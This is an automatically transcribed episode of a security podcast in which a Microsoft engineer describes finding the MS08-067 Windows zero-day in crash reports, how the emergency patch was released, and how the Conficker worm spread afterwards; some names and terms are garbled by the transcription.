Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows

Listen to what goes on internally when Microsoft discovers a major vulnerability within Windows. This is the story of what happened when Microsoft found a massive bug in Windows which paved the way for the largest worm in history. Guest John Lambert gives the inside story to Jack Reciter.

This episode is sponsored by SentinelOne. To learn more about our endpoint security solutions and get a 30-day free trial, visit sentinelone.com/darknetdiaries.

Enjoy!

Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows

Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows was automatically transcribed by Sonix with the latest audio-to-text algorithms. This transcript may contain errors. Sonix is the best audio automated transcription service in 2020. Our automated transcription algorithms works with many of the popular audio file formats.

Hey, it’s Jack. Host of the show. Let me ask you a question. Whose job is it to keep the roads you drive on safe? Is it the drivers sole responsibility? What about the car makers? Are they responsible for keeping the roads safe for other drivers? What about the cops? Maybe they need to come by and watch everyone to make sure they’re obeying the law and keeping everyone safe away. Maybe it’s the job of the civil engineers, the people who design the roads. I mean, a crazy, curvy, bumpy road with the speed limit of 100 miles per hour is obviously not safe. So must be their job to design it to be as safe as possible. Right. So whose job is it to keep the roads safe?

All these people, we need drivers to drive safe. We need cars to be built with safety in mind. And we need cops to catch people who aren’t being safe. And we need civil engineers to design us safe roads. And I think this analogy applies to keeping our networks and computers safe, too. We need users to be smart at what they click on and do. And we need software makers to design the software to be secure. And we need the cops to arrest people when they break the law. And we need groups who set up industry standards that guide us to safety. We cannot rely on one person to keep our networks safe. It takes all these people to always be vigilant, to keep our computers safe.

And this is a story about what happens when software maker finds a bug in their own software. And what those effects were. Specifically, this is a story about when Microsoft found a massive bug in Windows which paved the way for the largest worm in history.

These are true stories from the dark side of the Internet.

I’m Jack Reciter. This is Darknet Diaries.

Support for this episode comes from SentinelOne. It’s all too common. A family member or colleague calls asking for help because some kind of ransomware has infected their computer. Bummer. Now imagine this on the scale of an entire organization. This is exactly what set in a one was built to prevent and solve. Besides the ability to prevent ransomware and even rollback ransomware if it is encrypted, Sentinel 1 also has a ransomware warrantee. Visibility in each of these endpoints is available from an easy to use console, allowing security teams to be more efficient without the need to hire more and more people on top of that. Certainly one offers threat hunting, visibility and remote administration tools to manage and protect any IAPT devices connected to your network with Sentinel One. You can replace many products with one if you’re a CSO, a security leader or I.T. manager in the enterprise. Don’t settle to live in the past. Get a personalized demo and a 30 day free trial that allows you to see the benefits up close and personal. Go to SentinelOne. One dot com slash darknet diaries for your free demo.

Your Cyber Security Future starts today with Sentinel One.

I’m very excited about this episode because I think this is a rare story to hear. We aren’t going to hear from the hacker who found the exploit and we aren’t gonna hear from the company who got hacked by this exploit. Instead, we’re gonna go right to the source to hear the story of one of the most notorious bugs ever, right from the horse’s mouth. Microsoft.

Hello. Hey, Jack, can you hear me? Yeah, I hear you pretty well. What kind of Mike are using?

This is a headset. It’s this sexually made by Microsoft. This is John Lambert. My name is John Lambert and I work at Microsoft.

He’s been with Microsoft a long time while he was there. He’s spent 10 years working on a team called the Trustworthy Computing Group.

So that was a group that was created after the early worms of Code Red named Blaster Slammer. And it was designed to help improve customer trust in Microsoft products by fortifying them from a security, privacy and reliability perspective. The domain I worked in was security. And so a lot of that focus was on finding and eliminating vulnerabilities and designing and coding from the from the products and working across the Microsoft sort of products. We not just Windows or Office, but all of the products to sort of build the techniques that security researchers had had familiarity with and then inculcating that sort of ethos. And Know-How inside of the Microsoft development cycle.

Well, what an interesting role to how right. His mission is to improve the trust people have in Microsoft products by making them more secure. And I just looked this up in 2008. Microsoft had ninety one thousand employees with that many employees. Yeah, I guess it makes sense to make a team to improve the trust of their products. Oh, and in case you’re wondering, in 2019, they had one hundred and forty four thousand employees. Now, of course, the biggest Microsoft product that John would work with is Windows, the operating system itself. John got the ability to examine Windows in unique ways by looking at the source code and building relationships with developers and conducting security tests against it. It’s not really his job to make sure all the bugs are squashed or to find the bugs, but he was certainly involved in getting all the teams together to help find the bugs and get them fixed. Okay. Now, when the team at Microsoft finds a bug in Windows, they give it to the developers who then work on a fix and create a patch for it.

And they issued these patches on Tuesdays, every patch Tuesday, which is every second Tuesday of the month, that we will create a number of security bulletins. The bulletins essentially are are the advisory that describes. Here are the vulnerabilities that we are fixing and say Internet Explorer or Windows or Office. And every bulletin may have one or more vulnerabilities that is being fixed. Those have individual CVG identifiers that security press professionals sort of are familiar with. But the bulletin is essentially a grouping of them for a product.

And the bulletin is rated, you know, critical, important, moderate level of severity.

Now, these advisory bulletins put out on Patch Tuesday might have a name like m._s 0 7 Dash 0 2 9 or M.S. 0 8 dash 0 6 7. And if you see something like this, a mass 0 7 0 2 9, it means the advisory was published in 2007 and it was the twenty ninth advisory of the year.

So for this story, we’re gonna be talking about the security bulletin, M.S. 0 8 dash 0 6 7, which means we’re talking about this bug, which was founded in 2008. Vista had just come out the year before, but its adoption rate wasn’t that strong. So the majority of Microsoft Windows customers were using Windows XP still. And take a guess at how many lines of code it took to create Windows XP, already 45 million lines of code.

And of course, that was spread out among many teams trying to keep a program that big bug free is, well, in my opinion, impossible. It’s just way too big to keep a bug free. There has to be some function of routine in the code that didn’t get tested properly or coded properly and has a glaring bug, or sometimes it gets tested and coded properly. But there’s a bug that’s not so glaring in there. It only appears under weird circumstances like only when the memory is filled and it’s only a certain millisecond on a certain time of day. Weird stuff happens when you have a code base that big. And all this is to say because Windows XP was 45 million lines of code long just by that size alone, it must have had a lot of bugs. But before we get an M.S. 0 8 0 6 7, maybe we should talk about a bug found the year before called M.S. 0 7 0 2 9.

Okay. So that MSO 7 0. Twenty nine was a very important. It was sort of. Moment of insight, if you will, for all the things that came after it. What MSO 7 0 2 9 was, that was a bulletin that corrected a vulnerability with Windows DNS and that when Microsoft became aware of it, a customer that was being exploited in the wild contacted us and said somehow we just got attacked. Here is an attack tool that we were able to find associated with it. We think it’s exploiting a vulnerability somehow and that goes into msra. See?

Hamas C is the Microsoft Security Response Center. This is the team of security professionals within Microsoft that is in charge of making Windows secure and looking for bugs and getting them fixed. They took this report. They got and tested it to see if you could hack into a fully updated Windows computer with it. And it worked.

And then they investigated and found this zero-day and Windows DNS that is being used. They put out an advisory. They put out a bulletin. And what I was doing as I was looking at this sort of crash dump system that Microsoft has this Windows error reporting. And I was working with some engineers that were looking at the crash reports coming in associated with Windows DNS. The DNS product was otherwise very reliable and hardly ever crashed. And so the only crashes coming in at that point when we looked at them were actually attacks in the wild.

And when we started to examine them, we could tell that actually we could have known about this attack in the wild much earlier than the customer contacting us. If only we’d been able to pull these needles out of the massive haystack of crashes coming into Microsoft, different used Windows or Internet Explorer or Microsoft Word.

And the app suddenly crashes and it says, do you want to send the crash data to Microsoft? This is what’s known as WCR were.

Yeah. So Windows error reporting were. It’s also known internally as Dr. Watson. It’s really a technology that goes back to the late 90s. Both office and Windows were independently working on how do we get better data on how the products are crashing before we ship them. And then after we shipped them. Other than customers calling customer support, how do we get data about how they’re faring in the wild? And so both office and Windows had built features to collect crash reports at scale that could be automatically submitted by customers and then run analysis tools against them to try to root cause and bukkit them to say, OK, is this a new bug we don’t know about or is this an existing bug that we do know about happening again? And those two efforts came together and that feature was built into windows and that was called Windows Error Reporting.

So yeah, that little box that pops up when app crashes will ask you if you want to send the crash report to Microsoft.

And if they say yes, then that communicates with Microsoft and the backend system decides, is this something we already know about or is this something new? And if it’s new, it starts to prompt the user to potentially upload more data so we can root cause the issue further.

Now, remember, I said that XP had 45 million lines of code and a program that big is impossible to be bug free. And yet I don’t think it’s like just a dozen bugs in a program that big. And I don’t even think it’s just hundreds of bugs or thousands of bugs. I think there’s more like tens of thousands of bugs in a program with 45 million lines of code in it at the same time. Windows was installed on a billion computers in 2008. So Microsoft was seeing millions of crashed dumps a day from these computers. So let’s try to be a project manager for a second here and come up with a strategy to tackle these millions of trash dumps a day. We have a few options. First, let’s just filter out all the known bugs we’ve already fixed. People’s computers are crashing, but they just need to patch it and it won’t crash anymore. OK, that’s out of the way. But now when we try to prioritize what to look at next, it’s not so easy. It might make sense to tackle the bugs that show up the most, but these might be very low severity. Maybe not as important. Maybe there’s something with a more high severity, but not as many crash reports. So then you might decide to look at the highest severity crash reports instead. Or maybe some apps are more important than others. Like if Ms. Paint crashes, it might not be as big of a deal as if the whole computer was crashing. Or maybe you can look at the easiest to fix problems first. Get those out of the way. It’s really hard to know what to prioritize here. So this might give you a better understanding of how hard it would be to look through millions of crash reports a day to figure out what to fix first. But it was still very important for Microsoft to collect these dumps and analyze them at this time in 2007. John was starting to look at these crash reports to try to make sense of them.

They go up to a massive automated system. These tools run against them at scale and a completely headless way. They are sort of bucketed and bend in a way that makes it easy for engineers to know. Is there something new coming along or how active? How prevalent is this issue of wide variety of engineers across the company? If you know, if you work on office, you look in the office, crash buckets and see what is hot for you there. If you work in windows or any other product, you can kind of see how is my product crashing? So engineers across the company were using this to fix bugs. And then like, for example, in Windows Vista from the trustworthy computing side, they did all kinds of static analysis tools to find and remove reliability issues.

And I think they fixed one hundred thousand bugs through those efforts and through Windows reporting. They found another 5000 bugs that had escaped all of those processes that they went in fix. And so every service pack, every new product from Microsoft has is more reliable because they’re finding and fixing all these bugs that are manifesting in the wild. I was there kind of on the side saying this is a fascinating telemetry system. How do we look at this from a security point of view?

Said a hundred thousand bugs.

One hundred thousand. Changes to the product that were done because of not all of those are bugs. One way to think about as there’s no coding practices that are sort of outdated. Developers will know about these things is like calling these unsafe string functions like stir copy and so forth. And instead of trying to figure out which ones are vulnerabilities, which ones are not, they said let’s just go remove all of them from the product. And so that’s a massive amount of code changes. You know, many of those are not bugs. Many of those are not vulnerabilities.

But it’s an easy way to just go to go say, look, we’re gonna have a new standard of engineering where to go get rid of that whole class of thing by tackling that. So that’s an example of some of those changes. Yeah. Yeah. But I mean, are you exaggerating when you say one hundred thousand or. No. No.

Cheese. Can you imagine trying to keep something like this secure? To fix a hundred thousand things in the code just sounds like madness to try to complete. I guess this is why they needed ninety one thousand Microsoft employees to tackle huge issues like this. These crash reports were really helping them identify the problems that needed fixing. But even though these might be bugs, they might not all be security problems. Like if you click print and nothing happens. That might be a bug in the code. But is it really a security issue? A hacker probably can’t use that to take control of your computer or hack you. But John was looking at this and wondering if there is anything in these crash reports. That is something a hacker could use or maybe signs that a hacker caused a crash.

Some vulnerabilities are discovered by attackers and exploded in the wild before. Microsoft is aware of them. And how could we go find that before customers contact us? And we there are a lot of reasons that exploits actually fail in practice. And that was that was the idea, which is instead of trying to find exploits when they’re working, sometimes they don’t. And there’s a bunch of interesting reasons why they don’t. And by studying the causes of failure of those exploits in the wild, that would lead us to potentially discover them. Some of the reasons they fail are because the exploit was written for, say, an English language version of Windows and it’s run on a Chinese language version and they’re slightly different internally. So for a wide variety of reasons, that exploits would fail in practice. And I studied extensively all the different patterns of how they fail because that was what I needed to be able to understand.

To find them, the hunt was on for John. He wanted to find traces of hackers in the WCR logs. But like I was saying, there are millions of error logs a day. This wasn’t gonna be easy.

Yeah, I mean, I think back then it was over a billion a month and recognize it. It’s like how could you look through a billion a month because of the way Windows report buckets the issues. You don’t have to look at every single one, one by one. You’re really trying to find new ones, new ones that are interesting in a different way. And then another way to think about it is there’s only a certain number of ways that zero days are going to kind of show up and effect an application. And so, you know, people can send malicious documents that’ll crash words. A word is interesting to look at. People can send experts with the browser. So Internet Explorer would be interesting to look at. And then if you think about even inside of Microsoft Word, if an attack is going to happen, likely it’s going to happen when the user is first opening the document. You know, it’s rare that some exploit is designed to work when the user spit in word for an hour and they finally click tools, options, spell check, add in and then it goes, boom. Those are not the paths where an exploit is going to work. It’s gonna be in the file open code pad. So that further narrowed down the places that we needed to look at. Then exploits fail and certain specific patterns that are the kind of patterns that we sort of knew to go sifting over. So we’re able to work that funnel down from a billion reports a month to, you know, millions that seemed interesting to hundreds of thousands that had no other clues in them and so forth and whittled the funnel down.

John dedicated a lot of time to try to find this unknown vulnerability that some hacker was exploiting.

And when we come back from the break, John finds something that he’ll never forget.

Working remotely can be a challenge, especially for teams that are new to it. How do you deal with your work environment being the same as home while staying connected and productive? And then there’s your newest co-worker, the cat. Well, your friends at Trello have been powering remote teams globally for almost a decade, at a time when teams must come together more than ever to solve big challenges. Trello is here to help. Trello part of Atlassian is Collaborative Suite as an app with an easy to understand visual format, plus tons of features that make working with your team functional and just plain fun. Chelo keeps everyone organized and on the same page, helping teams communicate, focus and connect teams of all shapes and sizes at companies like Google, Fender, Costco and likely your favorite neighborhood coffee shop. All use Trello to collaborate and get work done. Try Trello for free and learn more at Trello dot com. That’s tr e-l l’eau dot com. Trello dot com.

On September 25th, I remember opening a crash report in for the service HHoS process that we have seen many millions of crash reports for already, because a couple of years earlier there was this other vulnerability MSO 6 0:40 that had been adopted by bots and worms to spread and it was causing millions of crashes against machines that had not put on that patch. But this one was a little different.

So first of all, it had an exploit. It had exploit code in it. OK, that didn’t mean it could be new. It could be an old one. It was at exploit on the stack, which is a critical part of memory that tells you that exploit was trying to be activated. Right now, it had a difference in it. What I call an egg hunt, which was an exploit technique that I had never seen before for any exploit in MSO 6 or 40. So this was either a new strain of that or something new for that service host and this a conscious and exploit writing technique where like as the bad guy, imagine you’re going to go scale a wall and you put all your attack tools in a you know, your thieving tools in a bundle and you throw it over the wall and then later you go scale the wall and go get that. And a cut breaks the exploit into two pieces for just serve a purpose. And it had that technique in it. So that alone drew my eye to look at it. And then the odds of there being a buffer overrun it and exploit in the same area as this MSO, six or 40 just seemed unlikely. And yet I felt like if it was new, this was really important. And so I just tried to stick with it and do what I could to rule in a rule out whether this was new. And one of the most stubborn clues was in a crash report. It has information about every diesel that is loaded into it and the vulnerable, the diesel that had MSO 6 or 40 was was loaded in it. That is the PSINet API 32. And the version information told me it was fully patched. So it clearly could not have been exploiting that vulnerability because that vulnerability did not exist in that version of the product.

John looked at the logs here and it looked like a hacker was exploiting two processes. One was basically injecting some hacker tools into the system, hiding an egg, if you will. And the other was going in and using those tools. A strange combo. But like John said, it was sort of like throwing your tools over the fence and then jumping over the fence to get them. The two processes being exploited here were a CBC host or service host net API 32.

Yeah. So sometimes when you are writing an exploit, you have constraints that you have to work within. And once your exploit starts to run, you have a number of steps as the attacker you’re going to want to do. Typically, that involves downloading some external piece of malware to that system and then launching that and then the rest of your attack. Then you’re resident on that computer and you can do whatever attacks that you want to do further from there. But you have to get it going. And sometimes that shell code is, as it’s called, to get going. You can’t fit within the constraints of the vulnerability, like the buffer, for example, needs to fit and is just too small a box to package all those instructions with it. And so in a hunt is a technique that is designed to solve that by first sending over some data and interacting with the vulnerable program in a way that doesn’t use the vulnerability at all. It just tries to get data in memory that is that bag of tools, that shell code that they are going to use later. And then the only thing that they need to get when they actually run the attack is a very small piece of shell code that basically goes and searches memory to find that bag of tools.

What a tricky exploit. And because there’s two parts to this bug, it makes it really hard to find. The more John looked at this particular crash report, the more he started to realize this was actively exploiting an unknown vulnerability in windows, which makes it a zero day bugs.

This, in a way, was the hardest moment of this entire thing for me, because I clearly had enough evidence to say this was a new attack, a new vulnerability that we did not know about. And to get the company to act, you need to actually pinpoint the vulnerability. We have to know what’s the code that’s wrong. Otherwise, nothing can happen. And I pored over the code and pored over the code and I could not figure it out. At one point, I decide the clock is ticking. This is a potentially really bad situation. I. Go ask for help if I’m going to figure this out. And I walked over to the office of Andrew. Andrew was a colleague of mine. We had worked together previously, actually. Andrew had looked at many crash reports for security objectives for a long time. And he knew he knew what this hunt was like, which is in a lot of ways, it can be a very frustrating hunt. And you can spend hours looking at something you think is real and then it’s not. And so what I wanted is hand this to one of the MSR C engineers and they will go figure this out. And he was reluctant to take an engineer off of an existing confirmed vulnerability that somebody else had reported. You know, it was in the middle of to go potentially chase a ghost. So he took it on, took a look at it. I think in his mind say, look, this is a false positive. This is not a real issue. And case closed. And and so there was some tension in the air with me really pushing a busy team to go look at something that likely was not going to pan out. But I felt like it could be important enough. It’s worth doing that. And Andrew wanting to protect his team, but do the due diligence to make sure we got the answer right.

So Andrew got a copy of this crash report and the code for these processes. And he started analyzing all this. He spent a couple of days looking at over and working on it, trying to find what the crash report means. There’s an egg somewhere in the code, but neither of them could find it. But this error report did say that there was something causing a crash. Now, keep in mind, John had only seen one crash report from this. This wasn’t a widespread issue. So both John and Andrew weren’t entirely sure how much effort they should spend in looking for something that only happened once on one computer. But if there was an unknown vulnerability, both John and Andrew wanted to find it and fix it.

So Andrew kept looking.

And then at one point he stops by my office and the look on his face told me everything.

The look was the look that that a security researcher has when they found something. There’s a goofy, happy smile that is also full of holy cow. I can’t believe how serious this thing is that I just found.

He said I found a vulnerability. And when I heard that, I I knew everything was going to the next two weeks of my life were going to be completely different because this was vulnerability was in an area that would allow an Internet worm to be written against it.

The vulnerability they found allowed an attacker to take remote control of a Windows computer. No need for a username and password. No need for RTP to be enabled or anything like that. Just give me full control of that computer and now I can issue my own commands on it, see any files, do whatever I want on that computer as if I’m right in front of it. And of course, to top it off, it’s a vulnerability in a fully updated version of Windows in the security world. We call this kind of vulnerability and RC, which means you can do remote code execution like a hacker can execute whatever commands they want on the victim’s machine. And this is the worst kind of vulnerability. It’s the most critical, the most severe, because you absolutely never want just any Joe Schmo executing commands on your computer, which has full defences up if you can run whatever commands you want on someone else’s computer. It pretty much means it’s your computer.

But to top it off, as if this highly critical and severe vulnerability wasn’t enough.

This exploit was where Amabel formable means that you have a vulnerability that an attacker can write and exploit for, and it can propagate across the internet, exploit that vulnerability, and then turn around and continue to repeat the process and propagate further. So it becomes a viral outbreak and it is the most damaged, damaging, devastating, disruptive kind of attack that can take place. And the world has seen many worms in the form of Blaster Code Red named Slammers Zotob. And we knew how devastating these attacks can be. Entire businesses are disrupted. Systems are taken offline. Network traffic gets clogged with worms, replicating out of control, using up all available bandwidth. And so we knew what the potential was. We didn’t think that that state had been happening yet, but we knew that was possible.

So when Anjou came to John’s office and told him this vulnerability is real.

Hummable, the two immediately jumped up and spring in action, so Andrew and I both are on the engineering side and we knew we needed to go activate the crisis response part of Microsoft.

So he and I immediately leave my office. We walk down the hallway to the office of the crisis manager. His name is Philip. Phillip has worked on many of Microsoft’s most important security crises, and he is chatting in his office with a colleague. We show up. He knew that wasn’t a good sign. We look at EPP and say we need to talk. He looks at his colleague and says, I’ll talk to you later. And then I said, We have a zero day.

And he just knew by the two of us showing up in that fashion that something bad was happening. I am mostly of have toothe emotions going on, one is we need to get all of Microsoft engaged on this that can do something about this. So that is a an impetus to go make sure you’re informing people so they understand the severity right away and they can begin the mobilization process. And then the other side of me was. What is really going on out there? I have one crash report. I don’t know if there are a hundred thousand out there just like this. And this is a worm that is raging across different parts of the world. Or this is something that’s just getting started.

So the the I immediately wanted to go and get some better situational awareness about scope and scale to know what we were really dealing with.

John and Andrew briefed the crisis manager on what’s going on. That a very serious worm, a bull, an extremely critical vulnerability is present in windows and needs to be fixed immediately. And while they found this in Windows XP, the vulnerability existed in more than just XP.

Yes. And it affected every version of Windows up until we had at that point. So Microsoft has a crisis response process that they invoke when one of these things occur. It’s called a SERP internally. And then a book called Bridge is stood up. And then all of the kind of crisis partners across the company join that call. And then Philip would take them through. Here’s a summary of the situation. And generally speaking, if there’s a vulnerability in windows, you know, teams know what to do. This would involve a lot more teams because they had to be ready for customer support calls. What is if there’s an attack? What is the malware? What is the threat side of it look like? And the anti-malware team will start building signatures for that. We knew we had to prepare data for all of the security partner companies across Symantec, McAfee or whatnot for them to help go protect their customers and the ecosystem. And and then the engineering team needs to go, OK, what do we have to do to fix this vulnerability? And are there any others just like it waiting there that we need to fix at the same time so we get the patch dead? Right.

A huge conference call was setup with pretty much someone representing all the different departments of Microsoft. The goal was to get everyone engaged in helping solve this as quickly as possible. This vulnerability was much more severe than any of the others they found.

Once I knew that the right people were engaged and working to get the right patch out the door, the thing I could go help on was how often is this happening and where is it happening? And I called that dialing into the crash buckets to find any information I could about how often this was occurring. Then I was able to bring back the situational awareness to the crisis response that said, OK, I saw it five more times today. It just spread from Malaysia to Japan to Singapore to what-not. And they could get a sense of OK. It’s the same attack payload communicating with the same IP address on the enter to pull it down, but it’s spreading from geography to geography to geography. So it didn’t look like a worm, but it looked like some set of of hackers that were going around using this tool across a variety of targets, expanding its scope every single day.

See, that’s fascinating. So somebody knew this vulnerability. They found this before Microsoft did and was using it. And this wasn’t just some accidental bit flip or something that caused the crash report like this was actually somebody had coded this and was using it in in Asia.

That’s right. So some somebody found this vulnerability, probably got the bonus of the year for finding it, and then it was weaponized. And then some group unknown to this day was using it in those geographies where we saw these crash reports coming and the tool was not completely reliable. And so that’s the crashes that we’re seeing. That’s when it failed. But obviously it worked and it succeeded a bunch of the time. And I didn’t know how often you for every crash is that one in one hundred times that it’s crashing or is it one in a thousand? You know what shadow of the real activity am I seeing? That was an unknown that we were working against.

And so but I could use this to sort of get a sense of it.

If it’s spread in its reach and its pace now, this became a top priority for the development team to fix. They dove into the code and fiercely started to rewrite the code to fix this problem.

And they did. They fixed the vulnerability. But this is not the end of our story. No, no, no, no, no, no. This is just the genesis. And stay with us, because after the break, we’ll hear how this went on to become one of the most notorious bugs ever to be found in windows.

Support for this episode comes from pro circular. Now, even though vendors make patches available for us to update our computers, patching is still really hard. It requires juggling files and scheduling reboots and to do all that at scale against all your computers. It can be a nightmare. No wonder MSO 8 0 6 7 was a problem for a whole decade. Pro Circular has helped hundreds of clients slay that dragon. It’s all about adding security in layers and they’re really good at helping with all the details of getting your network secure. They have a team that can help your business with patching and vulnerability management. Doing some monitoring that actually works penetration testing to verify it’s actually secure and incident response in case things do actually go bad. Whether you’re just getting started or looking to move to the next level at securing your business’s network, prosecutor has the people and resources to help you get their pro circular. It will help you confidently manage your cybersecurity risks. Visit w w w dot pro circular dot com. That’s w w w dot pro circular dot com.

Now that a fix was written and a patch was ready, a decision had to be made about how to release this to the world.

Right. So that there’s a decision point as part of this response process, which is OK. When is the patch going to be ready? And the ideal time to release a patch is on Patch Tuesday, because every I.T. team in every company knows on the second Tuesday of every month, there’ll be a set of security patches from Microsoft. And they know to organise their patching of their fleet of systems and take their downtime and their maintenance time to go put them on. And they know some of them will be severe and they should do that right away. So I.T. teams are best ready to consume those updates and put them out at that time. The other option is you just ship it when you’re ready. We call that going out of band. That gets the solution out there sooner. But at the same time, none of those I.T. teams are necessarily ready and poised to go grab it. And when you had a situation where there obviously was an attack in the wild that attackers were doing and we wanted to go stop that from happening, but we knew as soon as we put this out, copycat attacks would happen by people reverse engineering the patch and understanding, and that would spawn a whole nother wave of attacks. And so there was this like weighing of if you go out of band, you could spawn a bunch of copycats of a very damaging vulnerability when I.T. teams are not ready to go put it on and there could be more victimization. Theoretically, the bottom line in terms of our calculus on it was with a very severe vulnerability. It was warm, a bowl. It affected every version of Windows. We had a solution and we went out of hand.

This vulnerability was so severe that they decided to not wait until Patch Tuesday and just push this out immediately as soon as they got it. And this patch went out in 2008 and it was the sixty seventh patch of the year which famously made this M.S. 0 8 0 6 7.

Yeah. So that there were two most interesting things that happened after we went out of band. The first one was that attacker where I was seeing crash reports still coming in every day until we went public as soon as we went public. That attack disappeared and I never saw him again.

And how can you how can you trace that? Because I mean, oh, so you have like a signature for certain machines that kept getting attacked.

Well, part of the attack details that were hidden. So one, the shell code and egg hunt were kind of a fingerprint that let me see, that were consistent across all the crashes I had gotten to date for this issue. All of them were contacting the same IP address of a server in Japan and downloading a payload from it. And so all of that was consistent.

And then the day the patch goes live and we announce it. I see no more crash reports from this anymore. And then there’s this period where for a number of hours or a day, nothing’s coming in anymore. And then we see it start to see sort of see new crash reports for the same issue that were clearly security companies reproducing this vulnerability. They’d reverse engineer what we fixed in the patch. They were writing their own proof contests, concepts to crash. Crash it. Not right exploits for it, but just to probe the vulnerability, to make sure they understood it. And we started seeing those crash reports come in from the security researcher side. And soon enough, a few days later after that, we started to see new attacks from the first wave attackers that was clearly different and new than the original ones that look like, you know, bots or bot net programs adopting this as a spreading mechanism. And we started to see that wave as well.

See, this is what I mean by this being only the genesis. Now that the patches out there, both white hat and black hat, hackers analyzed the patch to figure out what this exploit was and how to run it, which means now this tool went from being just used by a single hacking group somewhere in the world to now being known by the general hacker community. And within a short time, it would become available for anyone in the world to just download and use.

Isn’t that a strange dilemma or decision to have to make, though, knowing that if you put a patch out, this reveals the vulnerability to the world for any hacker to use. But Microsoft has a duty to make secure products, so they absolutely have to release the patch whenever they do find a vulnerability like this, because this has far reaching effects on helping people stay secure in the first week.

We it was on Windows Update and within seven days I think we had patched 400 million machines.

This is sort of the awesome part about Windows Update. It’s a system that had been built to be to patch the Windows ecosystem at scale. And this is one of those times when you really needed it. And it came through in terms of our ability to essentially inoculate a huge swath of the world against this vulnerability in a very short period of time. And so it was very effective about that.

It’s hard to know for sure, but my best research tells me there was about one billion Windows computers in the world at that time, and this vulnerability affected all of them. So by having 400 million of them patch in the first week was a huge win for helping the world become more secure. 40 percent of the Windows computers in the world were no longer vulnerable to this right away. That’s awesome and amazing.

So all of this was in October and sometime in early December, the Conficker worm that had been the sort of small scale thing for a time.

Adopted this vulnerability as a spreading mechanism, and then it began to use that against systems around the world that had not put this patch on yet.

And if you think about, well, what if only one percent of the Windows pieces in the world don’t patch, that’s still millions of systems.

And so a lot of the damage that was done by Conficker, which was significant. Imagine what would have happened if it had a half a billion more pieces that were vulnerable and not patched against this issue.

Conficker was the first big attack to use this exploit just months after John discovered this vulnerability, Conficker figured it out and used it to arm itself to infect Windows machines, because the vulnerability in MSA 0 8 0 6 7 was so effective. Conficker spread rapidly worldwide, ultimately infecting computers in over 190 countries worldwide. It would eventually infect millions of computers. Conficker was spreading in a terrible way. I mean, think about how horrible this is for some hacker group to have full control of millions of Windows computers worldwide. I’m talking about government agencies, business at home, PCs. The hackers could see all the files on them, run any commands they wanted to install keyloggers, take screenshots, install root kids or do whatever they want on these computers.

It’s so frightening to think about that. Conficker continued to spread, seemingly unstoppable. By January, 30 percent of Windows Computer still did not apply the patch to protect themselves from Emmis 0 8 0 6 7 4 Conficker, which means hundreds of millions of computers were still vulnerable to this. Conficker had a field day with everyone who didn’t bother to patch and eventually was able to infect 10 million Windows computers worldwide million as far as I know.

This makes Conficker the largest worm ever. All thanks to M.S. 0 8 0 6 7.

It was disappointing because. At the same time, a strong lesson because we’ve put the patch out right.

The job is done. It’s time for the world to put the patch on their systems. That’s the step they have to do. There isn’t anything further that we thought we could do. And yet look what happened and what came after that. All of this damage from Conficker. Now, Conficker had other ways to spread through USB drive infections and scanning file shares and so forth. But still, there was a large part of the world that that had not patched against this vulnerability. And it was a bit of a lesson for just how damaging things can become and how much of the world can be exposed to these attacks even once we think we’ve done our part of the job.

It’s fascinating to me to see that John here was the one who decided to take it upon himself to look at that crash report to discover this. If it wasn’t for him, who knows how long this would have stayed out in the world before being discovered?

Yeah, I think, you know, these operators using this tool thought they had a really great a new attack and probably would have used it if it was more reliable.

And we had not seen this for potentially years. You know, if they were stealthy and choosy about how they how they used it. And sometimes these exploits we do learn about zero-day have been in use for years and very disciplined ways. The noisier operators are with it. The more likely that some victim is going to find out about it and somehow they’ll get a whiff of how the attack is working and the thing can get patched. But, you know, I I think if we had not seen this one in this way, very likely this operator could have continued for a very long time with it.

This makes me think about how stealthy some hackers could be. I mean, imagine if the hackers disabled WCR or blocked all connections to Microsoft. This would have been an effective technique to keep Microsoft from seeing these crash reports and discovering this. But maybe that’s going too crazy with it. But see, sophisticated hackers take extreme measures to hide their tracks. I mean, that’s almost one of your adversaries, right? Are these a Petey’s like the NSA? It’s like you’re battling with them, like it’s an arms race between you as the vendor and them as the aggressor.

Do you feel that way? Sometimes it does feel like that’s some way that sometimes in the sense of. There are people that have weaponized vulnerabilities and are using on the wild and in a way, the defenders that are at Microsoft, Google and other companies. I don’t care who these people are or why they’re doing it. We just want to find what they’re doing and take those tools away from them. And so every time a zero-day is found in the wild by some defender organization and it gets patched, that is a happy day for me.

What a strange thing to think about. Does that put you in deep thought, too?

I mean, the truth of the matter is that the NSA is actively looking for vulnerabilities in windows so that they can use that against their adversaries. And then here’s John actively trying to figure out what the NSA is up to. So he can basically expose their secret weapons. I don’t know what to think about that. I don’t know who the bad guy or the good guy is in this. NSA is supposed to be working towards keeping our country safe, but at the same time, they have to develop cyber weapons to attack other nations. So it almost seems like the NSA would see John and Microsoft as the enemy and John might see the NSA as the enemy.

And I just never thought about how these two would be battling each other like this. It’s just wild to think about this relationship.

Yeah. And then in many ways, I feel like I relive this whole moment. A couple of years ago, when the internal blue exploit was discovered, this is one of these NSA tools that the shadow broker’s group leaked onto the Internet. A patch was produced for it. That was M.S. 17. Oh, 1-0. And a couple months later, the one, a cry worm was unleashed and spread in a very similar way, had a more destructive payload and ran across the globe against systems that had not patched.

Now, if you recall in earlier episodes, NSA actually did tell Microsoft about Eternal Blue just before the shadow broker’s published it to the world, giving Microsoft an early warning. Who were able to move quickly and patches before it was released? I’m guessing the NSA knew it was going to be published and wanted to help the world.

Just stay slightly ahead of the game, but that must have been an awkward phone call or whatever from Microsoft to get the memo that NSA has found a devastating exploit in Windows and this exploit got leaked to shadow brokers and they’re about to leak it to the world. Now, I don’t know. It’s a weird, tangled mess when you get into the relationships between NSA and Microsoft. And just to be clear, there’s no link between MSO 8 0 6 7 being found by the NSA.

